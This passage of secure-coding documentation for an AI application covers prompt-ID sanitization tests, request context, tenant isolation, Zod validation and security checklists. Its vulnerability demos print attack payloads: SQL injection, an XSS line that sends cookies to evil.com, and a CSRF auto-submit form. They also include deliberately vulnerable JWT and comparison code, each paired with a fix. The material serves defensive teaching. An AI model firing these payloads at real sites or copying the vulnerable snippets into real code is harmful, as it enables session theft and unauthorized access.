assert len(violations) == 1
assert violations[0].severity == AuditSeverity.WARNING
def test_safe_builder_blocks_id(self):
with pytest.raises(PromptSecurityError):
(
SafePromptBuilder()
.add_instruction("Analyze for user 123e4567-e89b-12d3-a456-426614174000")
.build()
)
def test_safe_builder_sanitizes_content(self):
prompt, _ = (
SafePromptBuilder()
.add_content("Doc ID: 123e4567-e89b-12d3-a456-426614174000")
.build()
)
assert "123e4567" not in prompt
assert "[ID]" in prompt
def test_context_ids_not_in_prompt(self):
from uuid import uuid4
user_id = uuid4()
prompt, context = (
SafePromptBuilder()
.add_instruction("Analyze this")
.store_context_id("user_id", user_id)
.build()
)
assert str(user_id) not in prompt
        assert context["user_id"] == user_id
Request Context Pattern
Request Context Pattern
Purpose
The RequestContext is an immutable object created at the gateway that carries identity and tracing information through the entire request lifecycle. It flows AROUND the LLM (never in prompts) and is used for:
- Authorization - Who is making the request
- Data Filtering - Scope queries to tenant/user
- Attribution - Tag results with proper ownership
- Observability - Correlate logs and traces
Implementation
from dataclasses import dataclass
from datetime import datetime, timezone
from uuid import UUID
from typing import FrozenSet
@dataclass(frozen=True) # Immutable!
class RequestContext:
"""
System context that NEVER appears in LLM prompts.
Created at gateway, flows through all layers.
"""
# === Identity (WHO) ===
user_id: UUID
tenant_id: UUID # For B2B multi-tenant
session_id: str
permissions: FrozenSet[str]
# === Tracing (OBSERVABILITY) ===
request_id: str # Unique per request
trace_id: str # Distributed tracing
span_id: str # Current span
# === Resource (WHAT) ===
resource_id: UUID | None = None # analysis_id, document_id, etc.
resource_type: str | None = None
# === Metadata (WHEN, WHERE) ===
    timestamp: datetime | None = None
client_ip: str = ""
user_agent: str = ""
def __post_init__(self):
if self.timestamp is None:
            object.__setattr__(self, 'timestamp', datetime.now(timezone.utc))
Creation at Gateway
from fastapi import Request, Depends
from jose import jwt
async def get_request_context(request: Request) -> RequestContext:
"""FastAPI dependency that creates RequestContext from JWT"""
# 1. Extract and verify JWT
auth_header = request.headers.get("Authorization", "")
if not auth_header.startswith("Bearer "):
raise HTTPException(401, "Missing authorization")
token = auth_header[7:]
try:
claims = jwt.decode(token, SECRET_KEY, algorithms=["HS256"])
except jwt.JWTError:
raise HTTPException(401, "Invalid token")
# 2. Build immutable context
return RequestContext(
user_id=UUID(claims["sub"]),
tenant_id=UUID(claims["tenant_id"]),
session_id=claims["session_id"],
permissions=frozenset(claims.get("permissions", [])),
request_id=request.headers.get("X-Request-ID", str(uuid4())),
trace_id=generate_trace_id(),
span_id=generate_span_id(),
client_ip=request.client.host,
user_agent=request.headers.get("User-Agent", ""),
    )
Usage in Endpoints
@router.post("/api/v1/analyze")
async def create_analysis(
request: AnalyzeRequest,
ctx: RequestContext = Depends(get_request_context),
):
# Context is available throughout the request
# Pass it to services, repositories, etc.
# Authorization uses context
await authorize(ctx, "analysis:create", None)
# Data access uses context for filtering
documents = await repo.find_by_user(ctx)
# LLM call does NOT receive context
# (see llm-safety-patterns skill)
# Attribution uses context
result = await save_result(llm_output, ctx)
    return result
OrchestKit Parameters
In OrchestKit, these identifiers should be in RequestContext:
| Parameter | Type | Source | Purpose |
|---|---|---|---|
| user_id | UUID | JWT | Data ownership |
| tenant_id | UUID | JWT | Multi-tenant isolation |
| session_id | str | JWT | Session tracking |
| analysis_id | UUID | Generated | Current analysis job |
| trace_id | str | Generated | Langfuse tracing |
| request_id | str | Header/Generated | Request correlation |
Why Immutable?
The context is frozen (frozen=True), which guarantees:
- No accidental modification - user_id cannot change mid-request
- No security bypass - permissions cannot be escalated
- Thread safety - safe to pass between async tasks
- Hashability - usable as a dict key for caching
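These properties can be demonstrated directly with a reduced context (the Ctx class below is an illustrative stand-in, not the full RequestContext):

```python
from dataclasses import FrozenInstanceError, dataclass
from uuid import UUID, uuid4

@dataclass(frozen=True)
class Ctx:
    """Reduced stand-in for RequestContext."""
    user_id: UUID
    permissions: frozenset

ctx = Ctx(user_id=uuid4(), permissions=frozenset({"analysis:create"}))

# Any mutation attempt raises FrozenInstanceError
try:
    ctx.user_id = uuid4()
    mutated = True
except FrozenInstanceError:
    mutated = False

# Frozen dataclasses get __hash__, so the context can key a cache
cache = {ctx: "cached-result"}
```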
Anti-Patterns
# BAD: Mutable context
class RequestContext:
user_id: UUID # Can be changed!
# BAD: Context in prompt
prompt = f"User {ctx.user_id} wants to analyze..."
# BAD: Context not passed to services
result = await service.process(content) # Missing ctx!
# BAD: Context created inside service
def process(self):
    ctx = RequestContext(...)  # Should come from gateway!
Tenant Isolation
Tenant Isolation Patterns
The Golden Rule
Every database query MUST include a tenant filter. There is no "global" query.
Why This Matters
Without tenant isolation:
- User A could see User B's documents
- LLM could mix data from different tenants
- A bug could expose all customers' data
- Compliance violations (GDPR, HIPAA, SOC2)
Implementation Pattern: Tenant-Scoped Repository
from uuid import UUID
from typing import TypeVar, Generic
from sqlalchemy import select
from sqlalchemy.ext.asyncio import AsyncSession
T = TypeVar("T")
class TenantScopedRepository(Generic[T]):
"""
Base repository that ALWAYS filters by tenant.
Cannot be bypassed - tenant filter is mandatory.
"""
def __init__(self, session: AsyncSession, ctx: RequestContext, model: type[T]):
self.session = session
self.ctx = ctx
self.model = model
def _base_query(self):
"""Every query starts with tenant filter"""
return select(self.model).where(
self.model.tenant_id == self.ctx.tenant_id
)
async def find_all(self, **filters) -> list[T]:
"""Find all matching records (tenant-scoped)"""
query = self._base_query()
for key, value in filters.items():
query = query.where(getattr(self.model, key) == value)
result = await self.session.execute(query)
return result.scalars().all()
async def find_by_id(self, id: UUID) -> T | None:
"""
Find by ID (tenant-scoped).
Even by-ID lookup includes tenant check!
"""
query = self._base_query().where(self.model.id == id)
result = await self.session.execute(query)
return result.scalar_one_or_none()
async def find_by_user(self) -> list[T]:
"""Find records owned by current user (tenant + user scoped)"""
query = self._base_query().where(
self.model.user_id == self.ctx.user_id
)
result = await self.session.execute(query)
        return result.scalars().all()
Vector Search with Tenant Isolation
async def semantic_search(
query_embedding: list[float],
ctx: RequestContext,
limit: int = 10,
) -> list[Document]:
"""
Semantic search with mandatory tenant isolation.
"""
return await db.execute(
"""
SELECT id, content, metadata,
1 - (embedding <-> :query) as similarity
FROM documents
WHERE tenant_id = :tenant_id -- ALWAYS filtered!
AND user_id = :user_id -- User's docs only
AND embedding <-> :query < 0.5 -- Similarity threshold
ORDER BY embedding <-> :query
LIMIT :limit
""",
{
"tenant_id": ctx.tenant_id, # From context
"user_id": ctx.user_id, # From context
"query": query_embedding,
"limit": limit,
}
    )
Full-Text Search with Tenant Isolation
async def fulltext_search(
query: str,
ctx: RequestContext,
limit: int = 20,
) -> list[Analysis]:
"""
Full-text search with mandatory tenant isolation.
"""
return await db.execute(
"""
SELECT id, title, url,
ts_rank(search_vector, plainto_tsquery(:query)) as rank
FROM analyses
WHERE tenant_id = :tenant_id -- ALWAYS filtered!
AND user_id = :user_id -- User's analyses only
AND status = 'complete'
AND search_vector @@ plainto_tsquery(:query)
ORDER BY rank DESC
LIMIT :limit
""",
{
"tenant_id": ctx.tenant_id,
"user_id": ctx.user_id,
"query": query,
"limit": limit,
}
    )
Caching with Tenant Isolation
def cache_key(ctx: RequestContext, operation: str, *args) -> str:
"""
Cache keys MUST include tenant_id to prevent cross-tenant leakage.
"""
return f"{ctx.tenant_id}:{ctx.user_id}:{operation}:{':'.join(str(a) for a in args)}"
# Usage
key = cache_key(ctx, "analysis", analysis_id)
# Result: "tenant_abc:user_123:analysis:analysis_456"
Testing Tenant Isolation
import pytest
from uuid import uuid4
class TestTenantIsolation:
"""Every repository MUST have these tests"""
@pytest.fixture
def tenant_a_ctx(self):
return RequestContext(
user_id=uuid4(),
tenant_id=uuid4(), # Tenant A
...
)
@pytest.fixture
def tenant_b_ctx(self):
return RequestContext(
user_id=uuid4(),
tenant_id=uuid4(), # Tenant B (different!)
...
)
async def test_tenant_a_cannot_see_tenant_b_documents(
self,
tenant_a_ctx,
tenant_b_ctx,
db_session,
):
# Create document for Tenant B
doc = Document(
id=uuid4(),
tenant_id=tenant_b_ctx.tenant_id,
content="Secret data",
)
        db_session.add(doc)  # add() is synchronous, even on AsyncSession
await db_session.commit()
# Tenant A tries to access
repo = TenantScopedRepository(db_session, tenant_a_ctx, Document)
result = await repo.find_by_id(doc.id)
# MUST be None - tenant A cannot see tenant B's data
assert result is None
async def test_tenant_a_cannot_search_tenant_b_documents(
self,
tenant_a_ctx,
tenant_b_ctx,
):
# Create and embed document for Tenant B
await create_document(
tenant_id=tenant_b_ctx.tenant_id,
content="Machine learning tutorial",
)
# Tenant A searches for "machine learning"
results = await semantic_search(
query_embedding=embed("machine learning"),
ctx=tenant_a_ctx,
)
# MUST be empty - tenant A cannot find tenant B's data
        assert len(results) == 0
Common Mistakes
# BAD: Global query without tenant filter
async def find_all():
return await db.execute("SELECT * FROM documents")
# BAD: Tenant filter as optional parameter
async def find(tenant_id: UUID | None = None):
query = "SELECT * FROM documents"
if tenant_id: # Can be bypassed!
query += f" WHERE tenant_id = '{tenant_id}'"
# BAD: Trusting client-provided tenant_id
async def find(request: Request):
tenant_id = request.query_params["tenant_id"] # User controls this!
return await db.find(tenant_id=tenant_id)
# GOOD: Tenant from authenticated context only
async def find(ctx: RequestContext):
    return await db.find(tenant_id=ctx.tenant_id)  # From JWT
Row-Level Security (PostgreSQL)
For additional protection, use PostgreSQL RLS:
-- Enable RLS on table
ALTER TABLE documents ENABLE ROW LEVEL SECURITY;
-- Create policy
CREATE POLICY tenant_isolation ON documents
USING (tenant_id = current_setting('app.tenant_id')::uuid);
-- Set tenant before queries
SET app.tenant_id = 'tenant-uuid-here';
This provides database-level enforcement even if application code has bugs.
Vulnerability Demos
Vulnerability Demos
Vulnerability Demonstrations
Interactive examples showing how common vulnerabilities work and how to fix them.
SQL Injection
Vulnerable Code
# DO NOT USE - Example only
from fastapi import FastAPI, Query
import sqlite3
app = FastAPI()
@app.get("/users/search")
def search_users(username: str = Query(...)):
conn = sqlite3.connect("app.db")
cursor = conn.cursor()
# VULNERABLE: User input directly in query
query = f"SELECT * FROM users WHERE username = '{username}'"
cursor.execute(query)
return cursor.fetchall()
# Attack payload: username = "' OR '1'='1' --"
# Resulting query: SELECT * FROM users WHERE username = '' OR '1'='1' --'
# This returns ALL users in the database
Secure Code
# Safe implementation using parameterized queries
from fastapi import FastAPI, Query
import sqlite3
app = FastAPI()
@app.get("/users/search")
def search_users(username: str = Query(..., min_length=1, max_length=50)):
conn = sqlite3.connect("app.db")
cursor = conn.cursor()
# SAFE: Parameterized query - input is escaped by the driver
cursor.execute("SELECT * FROM users WHERE username = ?", (username,))
return cursor.fetchall()
# With SQLAlchemy ORM (preferred)
from sqlalchemy.orm import Session
from models import User
def search_users_orm(db: Session, username: str):
# SAFE: ORM handles parameterization
return db.query(User).filter(User.username == username).first()
Detection
- Pattern to find: f"SELECT, f"INSERT, f"UPDATE, f"DELETE, + "SELECT
- Bandit rule: B608 (hardcoded_sql_expressions)
- Semgrep rule: python.lang.security.audit.formatted-sql-query
# Detect with Bandit
bandit -r . -t B608
# Detect with Semgrep
semgrep --config "p/sql-injection" .
# Grep for f-string SQL
grep -rn "f\"SELECT\|f\"INSERT\|f\"UPDATE\|f\"DELETE" --include="*.py" .
Cross-Site Scripting (XSS)
Vulnerable Code
// DO NOT USE - Example only
// Reflected XSS - Dangerous innerHTML
function displayMessage() {
const urlParams = new URLSearchParams(window.location.search);
const message = urlParams.get('message');
// VULNERABLE: User input directly inserted as HTML
document.getElementById('output').innerHTML = message;
}
// Attack payload: ?message=<script>document.location='https://evil.com/steal?c='+document.cookie</script>
// This executes JavaScript that steals cookies
# DO NOT USE - Server-side XSS (Flask)
from flask import Flask, request
app = Flask(__name__)
@app.route('/greet')
def greet():
name = request.args.get('name', '')
# VULNERABLE: User input in HTML response
return f"<h1>Hello, {name}!</h1>"
# Attack: /greet?name=<script>alert('XSS')</script>
Secure Code
// Safe implementation using textContent
function displayMessage() {
const urlParams = new URLSearchParams(window.location.search);
const message = urlParams.get('message');
// SAFE: textContent escapes HTML entities
document.getElementById('output').textContent = message;
}
// If HTML is required, use DOMPurify
import DOMPurify from 'dompurify';
function displayRichMessage() {
const urlParams = new URLSearchParams(window.location.search);
const message = urlParams.get('message');
// SAFE: DOMPurify removes malicious content
document.getElementById('output').innerHTML = DOMPurify.sanitize(message);
}
# Safe implementation using template escaping
from flask import Flask, request, render_template_string
from markupsafe import escape
app = Flask(__name__)
@app.route('/greet')
def greet():
name = request.args.get('name', '')
# SAFE: escape() converts <script> to &lt;script&gt;
return f"<h1>Hello, {escape(name)}!</h1>"
# Or use Jinja2 templates (auto-escape by default)
@app.route('/greet-template')
def greet_template():
return render_template_string(
"<h1>Hello, {{ name }}!</h1>", # Auto-escaped
name=request.args.get('name', '')
)
Detection
- Pattern to find: .innerHTML =, dangerouslySetInnerHTML, v-html=
- ESLint rule: no-unsanitized/property
- Semgrep rule: javascript.browser.security.insecure-document-method
# Detect with Semgrep
semgrep --config "p/xss" .
# Grep for innerHTML
grep -rn "\.innerHTML\s*=" --include="*.js" --include="*.jsx" --include="*.ts" --include="*.tsx" .
# React dangerouslySetInnerHTML
grep -rn "dangerouslySetInnerHTML" --include="*.jsx" --include="*.tsx" .
Cross-Site Request Forgery (CSRF)
Vulnerable Code
# DO NOT USE - Example only
from fastapi import FastAPI, Form
app = FastAPI()
@app.post("/transfer")
async def transfer_money(
to_account: str = Form(...),
amount: float = Form(...)
):
# VULNERABLE: No CSRF protection
# Attacker can create a form on evil.com that submits to this endpoint
# When victim visits evil.com while logged in, their session cookie is sent
perform_transfer(to_account, amount)
return {"status": "success"}
<!-- Attacker's page on evil.com -->
<!-- DO NOT USE - Attack example only -->
<html>
<body onload="document.forms[0].submit()">
<form action="https://bank.com/transfer" method="POST">
<input type="hidden" name="to_account" value="ATTACKER123" />
<input type="hidden" name="amount" value="10000" />
</form>
</body>
</html>
Secure Code
# Safe implementation with CSRF tokens
from fastapi import FastAPI, Form, Depends, HTTPException, Request
from fastapi.responses import HTMLResponse
import secrets
from starlette.middleware.sessions import SessionMiddleware
app = FastAPI()
app.add_middleware(SessionMiddleware, secret_key="your-secret-key")
def get_csrf_token(request: Request) -> str:
if "csrf_token" not in request.session:
request.session["csrf_token"] = secrets.token_urlsafe(32)
return request.session["csrf_token"]
def verify_csrf_token(request: Request, csrf_token: str = Form(...)):
if request.session.get("csrf_token") != csrf_token:
raise HTTPException(status_code=403, detail="CSRF token mismatch")
@app.get("/transfer-form")
async def transfer_form(request: Request):
token = get_csrf_token(request)
return HTMLResponse(f"""
<form method="POST" action="/transfer">
<input type="hidden" name="csrf_token" value="{token}" />
<input name="to_account" placeholder="Account" />
<input name="amount" type="number" placeholder="Amount" />
<button type="submit">Transfer</button>
</form>
""")
@app.post("/transfer")
async def transfer_money(
request: Request,
to_account: str = Form(...),
amount: float = Form(...),
_: None = Depends(verify_csrf_token) # CSRF check
):
# SAFE: Request will fail without valid CSRF token
perform_transfer(to_account, amount)
return {"status": "success"}
# Alternative: SameSite cookies (modern approach)
from fastapi import FastAPI, Response
@app.post("/login")
async def login(response: Response, username: str, password: str):
# Authenticate user...
# SAFE: SameSite=Strict prevents cross-origin cookie sending
response.set_cookie(
key="session_id",
value=session_token,
httponly=True,
secure=True,
samesite="strict" # Key protection
)
return {"status": "logged_in"}
Detection
- Check for: Missing CSRF tokens in forms, cookies without SameSite
- Semgrep rule: python.django.security.audit.csrf-exempt
# Check cookie settings
grep -rn "set_cookie\|setCookie" --include="*.py" --include="*.js" . | grep -v "samesite"
# Django CSRF exempt decorators
grep -rn "@csrf_exempt" --include="*.py" .
# Check forms without CSRF tokens
grep -rn "<form" --include="*.html" . | grep -v "csrf"
Authentication Bypass
Vulnerable Code
# DO NOT USE - Example only
from fastapi import FastAPI, Header
import jwt
app = FastAPI()
SECRET_KEY = "mysecret"
@app.get("/admin")
async def admin_panel(authorization: str = Header(...)):
token = authorization.replace("Bearer ", "")
# VULNERABLE: Algorithm read from token header (algorithm confusion attack)
header = jwt.get_unverified_header(token)
payload = jwt.decode(token, SECRET_KEY, algorithms=[header['alg']])
# Attacker can set alg="none" or use public key as HMAC secret
if payload.get("role") == "admin":
return {"admin_data": "sensitive"}
return {"error": "Not admin"}
# DO NOT USE - Password comparison vulnerable to timing attack
import hmac
def check_password(stored_hash: str, provided_hash: str) -> bool:
# VULNERABLE: Early exit reveals password length
if len(stored_hash) != len(provided_hash):
return False
# VULNERABLE: Character-by-character comparison
for a, b in zip(stored_hash, provided_hash):
if a != b:
return False
return True
Secure Code
# Safe implementation with hardcoded algorithm
from fastapi import FastAPI, Header, HTTPException, Depends
import jwt
from datetime import datetime, timedelta
app = FastAPI()
SECRET_KEY = "your-256-bit-secret"
ALGORITHM = "HS256"
def verify_token(authorization: str = Header(...)):
try:
token = authorization.replace("Bearer ", "")
# SAFE: Algorithm is hardcoded, not read from token
payload = jwt.decode(
token,
SECRET_KEY,
algorithms=[ALGORITHM], # Fixed algorithm
options={
"require": ["exp", "iat", "sub"], # Required claims
}
)
return payload
except jwt.ExpiredSignatureError:
raise HTTPException(401, "Token expired")
except jwt.InvalidTokenError:
raise HTTPException(401, "Invalid token")
@app.get("/admin")
async def admin_panel(payload: dict = Depends(verify_token)):
if payload.get("role") != "admin":
raise HTTPException(403, "Admin access required")
return {"admin_data": "sensitive"}
# Safe password comparison using constant-time comparison
import hmac
import hashlib
def check_password_secure(stored_hash: str, provided_password: str) -> bool:
# Hash the provided password
provided_hash = hashlib.sha256(provided_password.encode()).hexdigest()
# SAFE: hmac.compare_digest uses constant-time comparison
return hmac.compare_digest(stored_hash, provided_hash)
# Better: Use a proper password hashing library
from passlib.hash import argon2
def verify_password(plain_password: str, hashed_password: str) -> bool:
# SAFE: Argon2 handles timing-safe comparison internally
return argon2.verify(plain_password, hashed_password)
Detection
- JWT patterns: jwt.get_unverified_header, algorithms= with a variable
- Password patterns: manual string comparison, missing hmac.compare_digest
# JWT algorithm confusion
grep -rn "get_unverified_header\|algorithms=\[" --include="*.py" .
# Timing attack vulnerable comparisons
semgrep --config "p/python-security-audit" .
# Check for weak password hashing
grep -rn "md5\|sha1\|sha256" --include="*.py" . | grep -i password
Summary Table
| Vulnerability | Bandit ID | Semgrep Config | Quick Fix |
|---|---|---|---|
| SQL Injection | B608 | p/sql-injection | Parameterized queries |
| XSS | N/A | p/xss | textContent, escape() |
| CSRF | N/A | p/django | SameSite cookies, tokens |
| JWT Algorithm | B105 | p/jwt | Hardcode algorithm |
| Timing Attack | B303 | p/python-security | hmac.compare_digest |
Related Skills
- input-validation - Sanitization patterns
- auth-patterns - Authentication implementation
- security-scanning - Automated detection
Zod V4 Api
Zod v4 API Reference
Installation
npm install zod@latest
Basic Types
import { z } from 'zod';
// Primitives
const stringSchema = z.string();
const numberSchema = z.number();
const booleanSchema = z.boolean();
const dateSchema = z.date();
const bigintSchema = z.bigint();
// String validations
z.string().min(1) // Non-empty
z.string().max(100) // Max length
z.string().email() // Email format
z.string().url() // URL format
z.string().uuid() // UUID format
z.string().regex(/pattern/) // Custom pattern
z.string().trim() // Trim whitespace
z.string().toLowerCase() // Lowercase
// Number validations
z.number().int() // Integer only
z.number().positive() // > 0
z.number().nonnegative() // >= 0
z.number().min(0) // >= 0
z.number().max(100) // <= 100
z.number().finite() // Not Infinity
Type Coercion (v4 Feature)
Automatically coerce input to desired type:
// Coerce to string
const stringSchema = z.coerce.string();
stringSchema.parse(123); // "123"
stringSchema.parse(true); // "true"
// Coerce to number
const numberSchema = z.coerce.number();
numberSchema.parse("123"); // 123
numberSchema.parse("3.14"); // 3.14
// Coerce to boolean
const booleanSchema = z.coerce.boolean();
booleanSchema.parse("true"); // true
booleanSchema.parse("1"); // true
booleanSchema.parse(""); // false
// Coerce to date
const dateSchema = z.coerce.date();
dateSchema.parse("2024-01-01"); // Date object
dateSchema.parse(1704067200000); // Date object
// Coerce to bigint
const bigintSchema = z.coerce.bigint();
bigintSchema.parse("9007199254740991"); // BigInt
Objects
const UserSchema = z.object({
id: z.string().uuid(),
email: z.string().email(),
name: z.string().min(2).max(100),
age: z.number().int().positive().optional(),
role: z.enum(['user', 'admin', 'moderator']),
createdAt: z.coerce.date(),
});
// Infer TypeScript type
type User = z.infer<typeof UserSchema>;
// Parse and validate
const user = UserSchema.parse(data);
// Safe parse (no throw)
const result = UserSchema.safeParse(data);
if (result.success) {
console.log(result.data);
} else {
console.log(result.error.errors);
}
Discriminated Unions (Recommended)
More efficient than regular unions:
const ShapeSchema = z.discriminatedUnion('type', [
z.object({
type: z.literal('circle'),
radius: z.number().positive(),
}),
z.object({
type: z.literal('rectangle'),
width: z.number().positive(),
height: z.number().positive(),
}),
z.object({
type: z.literal('triangle'),
base: z.number().positive(),
height: z.number().positive(),
}),
]);
type Shape = z.infer<typeof ShapeSchema>;
// Usage
const circle = ShapeSchema.parse({ type: 'circle', radius: 5 });
Transforms
Transform data during validation:
// Transform to uppercase
const uppercaseSchema = z.string().transform(s => s.toUpperCase());
uppercaseSchema.parse("hello"); // "HELLO"
// Compute derived field
const UserInputSchema = z.object({
firstName: z.string(),
lastName: z.string(),
}).transform(data => ({
...data,
fullName: `${data.firstName} ${data.lastName}`,
}));
// Parse string to object
const jsonSchema = z.string().transform((str, ctx) => {
try {
return JSON.parse(str);
} catch {
ctx.addIssue({
code: z.ZodIssueCode.custom,
message: "Invalid JSON",
});
return z.NEVER;
}
});
Refinements
Custom validation logic:
// Simple refinement
const passwordSchema = z.string()
.min(8)
.refine(
(val) => /[A-Z]/.test(val),
{ message: "Must contain uppercase letter" }
)
.refine(
(val) => /[0-9]/.test(val),
{ message: "Must contain number" }
);
// Super refinement (multiple issues)
const formSchema = z.object({
password: z.string().min(8),
confirmPassword: z.string(),
}).superRefine((data, ctx) => {
if (data.password !== data.confirmPassword) {
ctx.addIssue({
code: z.ZodIssueCode.custom,
message: "Passwords don't match",
path: ["confirmPassword"],
});
}
});
Async Refinements
For async validation (e.g., database checks):
const usernameSchema = z.string()
.min(3)
.refine(
async (username) => {
const exists = await checkUsernameExists(username);
return !exists;
},
{ message: "Username already taken" }
);
// Must use parseAsync
const result = await usernameSchema.parseAsync("newuser");
Error Handling
import { z, ZodError } from 'zod';
try {
UserSchema.parse(invalidData);
} catch (error) {
if (error instanceof ZodError) {
// Formatted errors
console.log(error.format());
// Flat errors
console.log(error.flatten());
// Issues array
error.issues.forEach(issue => {
console.log(issue.path, issue.message);
});
}
}
// Custom error map
const customErrorMap: z.ZodErrorMap = (issue, ctx) => {
if (issue.code === z.ZodIssueCode.invalid_type) {
return { message: `Expected ${issue.expected}, received ${issue.received}` };
}
return { message: ctx.defaultError };
};
z.setErrorMap(customErrorMap);
React Hook Form Integration
import { useForm } from 'react-hook-form';
import { zodResolver } from '@hookform/resolvers/zod';
const FormSchema = z.object({
email: z.string().email(),
password: z.string().min(8),
});
type FormData = z.infer<typeof FormSchema>;
function MyForm() {
const { register, handleSubmit, formState: { errors } } = useForm<FormData>({
resolver: zodResolver(FormSchema),
});
const onSubmit = (data: FormData) => {
console.log(data);
};
return (
<form onSubmit={handleSubmit(onSubmit)}>
<input {...register('email')} />
{errors.email && <span>{errors.email.message}</span>}
<input type="password" {...register('password')} />
{errors.password && <span>{errors.password.message}</span>}
<button type="submit">Submit</button>
</form>
);
}
Pydantic Comparison (Python)
from pydantic import BaseModel, EmailStr, Field, field_validator
class User(BaseModel):
email: EmailStr
name: str = Field(min_length=2, max_length=100)
age: int = Field(ge=0, le=150)
@field_validator('name')
@classmethod
def name_must_be_title_case(cls, v: str) -> str:
return v.title()
# Usage
user = User(email="test@example.com", name="john doe", age=25)
print(user.name)  # "John Doe"
External Links
Checklists (5)
Auth Checklist
Authentication Security Checklist
Password Security
- Use Argon2id (preferred) or bcrypt for hashing
- Minimum 12 character password requirement
- Check against common password lists
- No password hints or security questions
- Rate limit password attempts (5 per minute)
- Account lockout after 10 failed attempts
Token Security
- Access tokens: 15 min - 1 hour lifetime
- Refresh tokens: 7-30 days with rotation
- Store access tokens in memory only (not localStorage)
- Store refresh tokens in HTTPOnly cookies
- Implement refresh token rotation
- Revoke all tokens on password change
Session Security
- SESSION_COOKIE_SECURE=True (HTTPS only)
- SESSION_COOKIE_HTTPONLY=True (no JS access)
- SESSION_COOKIE_SAMESITE='Strict'
- Session timeout (1 hour inactivity)
- Regenerate session ID on login
OAuth 2.1 Compliance
- Use PKCE for ALL clients
- No implicit grant
- No password grant
- State parameter for CSRF protection
- Validate redirect_uri exactly
- Use HTTPS for all endpoints
Passkeys/WebAuthn (If Implemented)
- Require user verification (biometric)
- Require resident keys for passwordless
- Validate RP ID matches origin
- Track sign count for replay protection
- Allow multiple passkeys per user
Multi-Factor Authentication
- Offer MFA (TOTP, Passkeys)
- TOTP: 6 digits, 30-second window
- Backup codes (10 one-time use)
- Remember device option (30 days max)
- Require MFA for sensitive operations
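The "backup codes (10 one-time use)" item above can be sketched as follows; storing only hashes means a database leak does not expose usable codes. Names and code format are illustrative assumptions:

```python
# Sketch: generate 10 one-time backup codes; store hashes, show plaintext once.
import hashlib
import secrets


def generate_backup_codes(count: int = 10) -> tuple[list[str], list[str]]:
    """Return (plaintext codes to show the user once, hashes to store)."""
    codes = [secrets.token_hex(4) for _ in range(count)]  # 8 hex chars each
    hashes = [hashlib.sha256(c.encode()).hexdigest() for c in codes]
    return codes, hashes


def redeem_backup_code(code: str, stored_hashes: list[str]) -> bool:
    """Consume a code: valid at most once."""
    h = hashlib.sha256(code.encode()).hexdigest()
    if h in stored_hashes:
        stored_hashes.remove(h)  # One-time use
        return True
    return False
```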
Rate Limiting
| Endpoint | Limit |
|---|---|
| Login | 5 per minute |
| Password reset | 3 per hour |
| MFA verify | 5 per minute |
| Registration | 10 per hour |
| API general | 100 per minute |
Error Messages
- Generic "Invalid credentials" (don't reveal which is wrong)
- Don't reveal if email exists in forgot password
- Log detailed errors server-side only
- No stack traces in production
Secure Headers
response.headers['Strict-Transport-Security'] = 'max-age=31536000; includeSubDomains'
response.headers['X-Content-Type-Options'] = 'nosniff'
response.headers['X-Frame-Options'] = 'DENY'
response.headers['Content-Security-Policy'] = "default-src 'self'"
Audit Logging
- Log all authentication attempts
- Log password changes
- Log MFA setup/disable
- Log token revocations
- Log suspicious activity (multiple failed attempts)
Review Checklist
Before deployment:
- No hardcoded secrets in code
- Secrets in environment variables
- HTTPS enforced everywhere
- Rate limiting configured
- Audit logging enabled
- Password hashing uses Argon2id or bcrypt
- Token lifetimes appropriate
- MFA available
Common Vulnerabilities to Avoid
- No password in URL parameters
- No session ID in URL
- No sensitive data in JWT payload
- No implicit OAuth grant
- No predictable session IDs
- No client-side token storage in localStorage
Pre Deployment Security
Pre-Deployment Security Checklist
Before deploying any AI feature, verify all 8 layers:
Layer 0: Edge Protection
- WAF rules active for OWASP Top 10
- Rate limiting configured per user/IP
- DDoS protection enabled
- HTTPS enforced (no HTTP)
Layer 1: Gateway / Authentication
- JWT validation active
- Token expiry enforced
- RequestContext created from JWT (not user input)
- Permissions extracted from token
Layer 2: Input Validation
- Pydantic/Zod models for all request bodies
- Size limits on all inputs
- PII detection on user-provided content
- Injection pattern detection (SQL, XSS, prompt)
Layer 3: Authorization
- Every endpoint has authorization check
- RBAC/ABAC policies defined
- Cross-tenant access blocked
- Resource-level access verified
Layer 4: Data Access
- All queries use parameterized values (no f-strings)
- All queries include tenant_id filter
- Repository pattern enforces tenant scope
- Vector search includes tenant filter
Layer 5: LLM Orchestration
- No user_id in prompts
- No tenant_id in prompts
- No analysis_id in prompts
- No document_id in prompts
- No UUIDs in prompts
- Prompt audit check passes
Layer 6: Output Validation
- LLM output parsed with schema
- Content guardrails active (toxicity, PII)
- Hallucination detection for critical fields
- Output size limits enforced
Layer 7: Attribution & Storage
- Attribution uses RequestContext (not LLM output)
- Source references from pre-LLM lookup
- Audit event logged
- Data encrypted at rest
Layer 8: Observability
- Structured logging active
- Sensitive data redacted from logs
- Langfuse tracing enabled
- Metrics exported (latency, errors, tokens)
- Alerts configured for anomalies
Quick Verification Commands
# Check for IDs in prompt templates
grep -rn "user_id\|tenant_id\|analysis_id\|document_id" backend/app/**/prompts/
# Check for raw SQL (should use parameterized)
grep -rn "f\"SELECT\|f'SELECT" backend/app/
# Check for missing tenant filter
grep -rn "SELECT.*FROM" backend/app/ | grep -v "tenant_id"
# Run security linter
poetry run bandit -r backend/app/ -f json
# Check for hardcoded secrets
grep -rn "api_key\s*=\s*['\"]" backend/
Sign-off required before merge:
- Developer self-review
- Security checklist verified
- Code reviewer approved
- CI/CD security scans pass
Pre Llm Call
Pre-LLM Call Checklist
Before ANY LLM Call in OrchestKit
Use this checklist before sending any prompt to an LLM:
Phase 1: Context Available
- RequestContext obtained from JWT (not user input)
- user_id available in context
- tenant_id available in context
- trace_id set for observability
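Phase 1 can be sketched as a context built exclusively from verified JWT claims, never from request parameters. The claim names (`sub`, `tenant_id`) and the `RequestContext` fields here are assumptions for illustration:

```python
# Sketch: build RequestContext from a decoded, signature-verified JWT payload.
# The claims dict must come from jwt.decode() or equivalent, never from user input.
import uuid
from dataclasses import dataclass


@dataclass(frozen=True)
class RequestContext:
    user_id: str
    tenant_id: str
    trace_id: str


def context_from_claims(claims: dict) -> RequestContext:
    for required in ("sub", "tenant_id"):
        if required not in claims:
            raise ValueError(f"missing claim: {required}")
    return RequestContext(
        user_id=claims["sub"],
        tenant_id=claims["tenant_id"],
        trace_id=str(uuid.uuid4()),  # fresh trace id per request
    )
```

Freezing the dataclass prevents downstream code from mutating the tenant mid-request.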
Phase 2: Data Isolation
- Query includes WHERE tenant_id = :tenant_id
- Query includes WHERE user_id = :user_id (if user-scoped)
- Vector search filtered by tenant
